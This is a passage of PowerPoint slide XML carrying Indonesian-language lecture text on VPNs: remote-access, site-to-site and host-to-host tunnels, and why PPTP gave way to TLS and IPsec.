              <a:t>rumahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket-paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router ISP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>VPN juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model situs-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, VPN situs-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> host-to-host. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sarana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertahun-tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Point-to-Point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tunneling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Protocol (PPTP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Transport Layer Security (TLS) dan Internet Protocol Security (IPsec) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN.</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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240693041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Terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Transport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
